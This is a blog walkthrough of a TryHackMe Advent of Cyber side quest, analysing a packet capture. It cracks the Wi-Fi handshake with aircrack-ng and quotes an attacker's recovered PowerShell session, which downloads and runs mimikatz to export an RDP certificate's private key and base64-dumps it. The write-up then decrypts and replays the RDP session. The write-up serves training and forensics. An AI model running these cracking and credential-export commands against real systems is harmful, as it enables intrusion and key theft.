TryHackMe Advent Of Cyber Side Quest 01
Table of Contents
ToggleWelcome! In today's challenge, we'll be looking at network packets inspection, wifi password cracking and much more. Get your wireshark ready, and lets go.
What's the name of the WiFi network in the PCAP?
This one is easy. We just have to look at the very first packet.
1 0.000000000 22:c7:12:c7:e2:35 Broadcast 802.11 122 Beacon frame, SN=0, FN=0, Flags=........, BI=100, SSID="FreeWifiBFC"
Answer: FreeWifiBFC
What's the password to access the WiFi network?
Now we're talking. For this one, we must filter for eapol
packets related to the WPA handshake, and at least one beacon
packet to identify the network.
Select the very first packet, Right-click > Apply as Filter > Selected
Add eapol to the filter. Your filter string should look like the following:
frame.len == 122 || eapol
Follow these steps:
File > Export Specified Packets > Export as: Wireshark/tcpdump - pcap
. Specify a filename to save as and hit Save.Use
aircrack-ng YOUR_NEWLY_SAVED_PCAP /usr/share/wordlists/rockyou.txt
in order to crack the Wifi password.
Answer: Christmas
What suspicious tool is used by the attacker to extract a juicy file from the server?
We discovered the wifi password. What this means it that we are now able to decrypt packets, which allows further analysis. For this to work, let's use a tool provided from Wireshark called WPA PSK Generator. Once you have fulfilled the required information, you should get a PSK hash.
To import a PSK hash to Wireshark, go to Edit > Preferences > Protocols > IEE802.11
. Click to "Enable decryption" and in "Decryption keys" hit "Edit...".
Key type: wpa-psk Key: a83f1d1d1d1f2d068ed447cee9fd3aaab2864289faf84993d7c1a029973d449f
Hit OK and OK. Now, you should get more information on the network traffic as a whole. Remember to clear the filters just in case you forgot to do so.
Further analysis revealed that 10.0.0.3
is performing a port scan, indicating that this IP is probably owned by an attacker. If we filter for traffic coming from 10.0.0.3
(filter: ip.src == 10.0.0.3
), we can see not only packets related to port scanning, but also a TCP stream to 10.1.1.1
, containing a winrm session in cleartext.
Filter: tcp.stream eq 1005
Right-click on any packet and hit follow TCP stream.
The entire conversation is below:
Windows PowerShell running as user Administrator on INTERN-PC
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator> PS C:\Users\Administrator>
PS C:\Users\Administrator> dir
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/23/2023 9:47 PM .ssh
d-r--- 3/17/2021 3:13 PM 3D Objects
d-r--- 3/17/2021 3:13 PM Contacts
d-r--- 11/25/2023 2:12 PM Desktop
d-r--- 3/17/2021 3:13 PM Documents
d-r--- 11/24/2023 10:53 PM Downloads
d-r--- 3/17/2021 3:13 PM Favorites
d-r--- 3/17/2021 3:13 PM Links
d-r--- 3/17/2021 3:13 PM Music
d-r--- 11/24/2023 10:44 PM Pictures
d-r--- 3/17/2021 3:13 PM Saved Games
d-r--- 3/17/2021 3:13 PM Searches
d-r--- 3/17/2021 3:13 PM Videos
-a---- 11/25/2023 6:01 AM 8192 psh4444.exe
PS C:\Users\Administrator> whoami
intern-pc\administrator
PS C:\Users\Administrator> wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -O mimi.zip
PS C:\Users\Administrator> Expand-Archive .\mimi.zip
PS C:\Users\Administrator> mv mimi/x64/mimikatz.exe .
PS C:\Users\Administrator> cmd /c mimikatz.exe privilege::debug token::elevate crypto::capi "crypto::certificates /systemstore:LOCAL_MACHINE /store:\`"Remote Desktop\`" /export" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
496 {0;000003e7} 1 D 16529 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;0002bbfa} 2 D 25564822 INTERN-PC\Administrator S-1-5-21-1966530601-3185510712-10604624-500 (14g,24p) Primary
* Thread Token : {0;000003e7} 1 D 25609341 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # crypto::capi
Local CryptoAPI RSA CSP patched
Local CryptoAPI DSS CSP patched
mimikatz(commandline) # crypto::certificates /systemstore:LOCAL_MACHINE /store:"Remote Desktop" /export
* System Store : 'LOCAL_MACHINE' (0x00020000)
* Store : 'Remote Desktop'
0. INTERN-PC
Subject : CN=INTERN-PC
Issuer : CN=INTERN-PC
Serial : ffb1d93a1df0324cadd5e13f3f9f1b51
Algorithm: 1.2.840.113549.1.1.1 (RSA)
Validity : 11/22/2023 9:18:19 PM -> 5/23/2024 9:18:19 PM
Hash SHA1: a0168513fd57577ecc0204f01441a3bd5401ada7
Key Container : TSSecKeySet1
Provider : Microsoft Enhanced Cryptographic Provider v1.0
Provider type : RSA_FULL (1)
Type : AT_KEYEXCHANGE (0x00000001)
|Provider name : Microsoft Enhanced Cryptographic Provider v1.0
|Key Container : TSSecKeySet1
|Unique name : f686aace6942fb7f7ceb231212eef4a4_c5d2b969-b61a-4159-8f78-6391a1c805db
|Implementation: CRYPT_IMPL_SOFTWARE ;
Algorithm : CALG_RSA_KEYX
Key size : 2048 (0x00000800)
Key permissions: 0000003b ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
Exportable key : NO
Public export : OK - 'LOCAL_MACHINE_Remote Desktop_0_INTERN-PC.der'
Private export : OK - 'LOCAL_MACHINE_Remote Desktop_0_INTERN-PC.pfx'
mimikatz(commandline) # exit
Bye!
PS C:\Users\Administrator> dir
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/23/2023 9:47 PM .ssh
d-r--- 3/17/2021 3:13 PM 3D Objects
d-r--- 3/17/2021 3:13 PM Contacts
d-r--- 11/25/2023 2:12 PM Desktop
d-r--- 3/17/2021 3:13 PM Documents
d-r--- 11/24/2023 10:53 PM Downloads
d-r--- 3/17/2021 3:13 PM Favorites
d-r--- 3/17/2021 3:13 PM Links
d----- 11/25/2023 2:56 PM mimi
d-r--- 3/17/2021 3:13 PM Music
d-r--- 11/24/2023 10:44 PM Pictures
d-r--- 3/17/2021 3:13 PM Saved Games
d-r--- 3/17/2021 3:13 PM Searches
d-r--- 3/17/2021 3:13 PM Videos
-a---- 11/25/2023 2:56 PM 730 LOCAL_MACHINE_Remote Desktop_0_INTERN-PC.der
-a---- 11/25/2023 2:56 PM 2493 LOCAL_MACHINE_Remote Desktop_0_INTERN-PC.pfx
-a---- 11/25/2023 2:56 PM 1206166 mimi.zip
-a---- 9/19/2022 4:44 PM 1355264 mimikatz.exe
-a---- 11/25/2023 6:01 AM 8192 psh4444.exe
PS C:\Users\Administrator> [Convert]::ToBase64String([IO.File]::ReadAllBytes("/users/administrator/LOCAL_MACHINE_Remote Desktop_0_INTERN-PC.pfx"))
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
PS C:\Users\Administrator> exit
Answer: mimikatz
What is the case number assigned by the CyberPolice to the issues reported by McSkidy?
Okay. Let's have some fun.
If you may have noticed from the previous task, the attacker ran the command: [Convert]::ToBase64String([IO.File]::ReadAllBytes("/users/administrator/LOCAL_MACHINE_Remote Desktop_0_INTERN-PC.pfx"))
which basically base64 encodes the file located at /users/administrator/LOCAL_MACHINE_Remote Desktop_0_INTERN-PC.pfx
.
This file is specially useful for us since it allows us to decrypt RDP traffic on wireshark and see a video replay of the RDP session. The steps to finish this challenge are below:
Copy the base64 encoded pfx certificate and save to a file named
encoded-pfx.txt
.Decode the certificate and save the decoded content to another file:
cat encoded-pfx.txt | base64 -d > server_certificate.pfx
Use the following command to extract the key in PEM format
openssl pkcs12 -in server_certificate.pfx -nocerts -out server_key.pem -nodes
.Remove passphrase from the key:
openssl rsa -in server_key.pem -out server.key
. The default passphrase ismimikatz
.In Wireshark, head to
Edit > Preferences > Protocols > TLS > RSA Key list
Put
10.1.1.1
as the "IP address" value, as this is the IP of the RDP server. "Port" must be3389
. "Protocol" must betpkt
and for "Key File", select the path to theserver.key
file created earlier. Hit OK to save.Head to
File > Save As...
and selectwireshark/tcpdump - pcap
in "Save as" option. The file name is up to you.We're on the final steps! Download pyrdp and follow their installation instructions to continue.
Use
pyrdp-convert
to convert yourpcap
file saved on item 7 to a format that pyrdp can understand:pyrdp-convert ~/Hacking/TryHackMe/AOC2023/side_quest_1/test.pcap
pyrdp-convert ~/Hacking/TryHackMe/AOC2023/side_quest_1/test.pcap
[*] Analyzing PCAP '/home/kali/Hacking/TryHackMe/AOC2023/side_quest_1/test.pcap' ...
- 10.0.0.2:55510 -> 10.1.1.1:3389 : plaintext
[*] Processing 10.0.0.2:55510 -> 10.1.1.1:3389
41% (3059 of 7405) |############# | Elapsed Time: 0:00:00 ETA: 0:00:01
[-] Failed to handle data, continuing anyway: unpack requires a buffer of 4 bytes
70% (5232 of 7405) |####################### | Elapsed Time: 0:00:01 ETA: 0:00:00
[-] Failed to handle data, continuing anyway: unpack requires a buffer of 4 bytes
97% (7245 of 7405) |################################ | Elapsed Time: 0:00:02 ETA: 0:00:00
[-] Failed to handle data, continuing anyway: Trying to parse unknown MCS PDU type 12
100% (7405 of 7405) |#################################| Elapsed Time: 0:00:02 Time: 0:00:02
[+] Successfully wrote '20231125145052_10.0.0.2:55510-10.1.1.1:3389.pyrdp'
By now you should have a valid .pyrdp file. To view its contents, run
pyrdp-player <FILENAME>
. If you get this error:qt.qpa.plugin: From 6.5.0, xcb-cursor0 or libxcb-cursor0 is needed to load the Qt xcb platform plugin.
just runsudo apt install libxcb-cursor0
to fix it.Hit play, and watch closely as the two remaining answers are in this replay.
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.